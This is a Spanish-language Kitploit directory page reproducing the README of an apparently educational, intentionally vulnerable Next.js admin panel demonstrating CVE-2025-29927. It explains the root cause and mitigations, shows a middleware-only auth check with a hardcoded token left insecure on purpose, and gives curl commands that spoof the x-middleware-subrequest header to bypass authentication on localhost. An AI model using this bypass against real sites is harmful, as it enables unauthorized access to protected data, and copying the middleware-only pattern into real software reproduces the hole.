Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-29927-nextjs | Kitploit
Herramientas/GitHubGitHub/gitgudkrish/cve-2025-29927-nextjs
Análisis de VulnerabilidadesExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAutenticaciónAprendizaje y Educación
GitHubgitgudkrish/cve-2025-29927-nextjs

cve-2025-29927-nextjs

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Panel de administración de Himalaya Tech — Demo de CVE-2025-29927

ADVERTENCIA: Esta aplicación es intencionalmente vulnerable. Solo para fines educativos y de investigación de seguridad autorizada. No la implementes en un servidor público.


Acerca de esta demo

Esta aplicación demuestra CVE-2025-29927, una vulnerabilidad crítica de omisión de autenticación en el middleware de Next.js (CVSS 9.1). La aplicación simula un panel de administración corporativo realista para la empresa ficticia «Himalaya Tech Pvt. Ltd.», lo que hace que el impacto de la omisión sea visualmente convincente.

Todos los registros de empleados, claves de API, credenciales de base de datos y demás datos «sensibles» mostrados son totalmente ficticios y simulados, generados únicamente con fines de demostración educativa.


CVE-2025-29927 — Resumen de la vulnerabilidad

CampoDetalle
CVE IDCVE-2025-29927
GravedadCrítica (CVSS 9.1)
AfectaNext.js ≤ 14.2.29, Next.js ≤ 15.2.2
Corregido enNext.js 14.2.30, 15.2.3
TipoOmisión de autenticación en middleware mediante manipulación de cabeceras HTTP

Causa raíz

Next.js utiliza una cabecera HTTP interna x-middleware-subrequest para rastrear llamadas recursivas del middleware y evitar bucles infinitos. En las versiones vulnerables, un atacante puede falsear esta cabecera en una solicitud externa. Cuando la cabecera está presente y coincide con el identificador del middleware, el runtime de Next.js omite el middleware por completo, incluida toda la lógica de autenticación definida en él.

Impacto

Cualquier aplicación que dependa únicamente de middleware.ts para proteger rutas (un patrón común y recomendado en Next.js) es vulnerable. Un atacante no autenticado puede acceder a cualquier página protegida con solo añadir una cabecera HTTP.


Prueba de concepto

Solicitud normal (bloqueada — redirige a /login)

root@kitploit:~
curl -v http://localhost:3000/admin
# → 307 Redirect to /login

Solicitud de omisión (exitosa — devuelve la página de administración completa)

root@kitploit:~
curl -v \
  -H "x-middleware-subrequest: middleware" \
  http://localhost:3000/admin

# → 200 OK — full admin dashboard HTML returned, no authentication required

Acceso a rutas protegidas anidadas

root@kitploit:~
# Admin users page
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/users

# System settings with "production credentials"
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/settings

Uso desde un navegador (mediante Burp Suite / extensión de navegador)

Añade la cabecera de solicitud x-middleware-subrequest: middleware a cualquier solicitud a /admin/* y la comprobación del middleware se omitirá.


Por qué esta aplicación es vulnerable

middleware.ts es el único mecanismo de protección:

root@kitploit:~
// middleware.ts
export function middleware(request: NextRequest) {
  if (pathname.startsWith("/admin")) {
    const token = request.cookies.get("auth-token")?.value;
    if (!token || token !== "valid-session-xyz123") {
      return NextResponse.redirect(loginUrl); // ← this entire function is skipped
    }
  }
  return NextResponse.next();
}

Los propios componentes de las páginas (p. ej., app/admin/page.tsx) no contienen comprobaciones de autenticación, a propósito, para reflejar aplicaciones reales que siguen el patrón de protección exclusiva mediante middleware.


Configuración y ejecución

Requisitos previos

  • Node.js 18+
  • npm o yarn

Instalación

root@kitploit:~
npm install

Ejecutar el servidor de desarrollo

root@kitploit:~
npm run dev

La aplicación estará disponible en http://localhost:3000.

Rutas

*Protegidas solo por middleware — omitidas por CVE-2025-29927.

Credenciales de demostración (flujo de inicio de sesión normal)

  • Correo electrónico: [email protected]
  • Contraseña: Admin@2024

Mitigación

  1. Actualiza Next.js a 14.2.30+ o 15.2.3+.
  2. Defensa en profundidad: Añade comprobaciones de autenticación del lado del servidor dentro de los componentes de página y manejadores de ruta, no solo en el middleware. El middleware debe tratarse como una optimización de UX, no como un límite de seguridad.
  3. Elimina la cabecera en tu proxy inverso/CDN antes de que las solicitudes lleguen a Next.js.

Aviso legal

Esta aplicación se proporciona únicamente con fines educativos, específicamente para demostrar el impacto en el mundo real de CVE-2025-29927 en un contexto de curso de seguridad ética. Todos los datos (registros de empleados, claves de API, credenciales) son totalmente ficticios. No utilices esta aplicación de demostración ni las técnicas aquí mostradas contra sistemas que no poseas o para los que no cuentes con permiso explícito de prueba.

Descargar herramienta
RutaAutenticación requeridaDescripción
/NoPágina de inicio pública
/loginNoFormulario de inicio de sesión
/adminSí*Panel de administración con datos sensibles
/admin/usersSí*Gestión de usuarios
/admin/settingsSí*Configuración del sistema y credenciales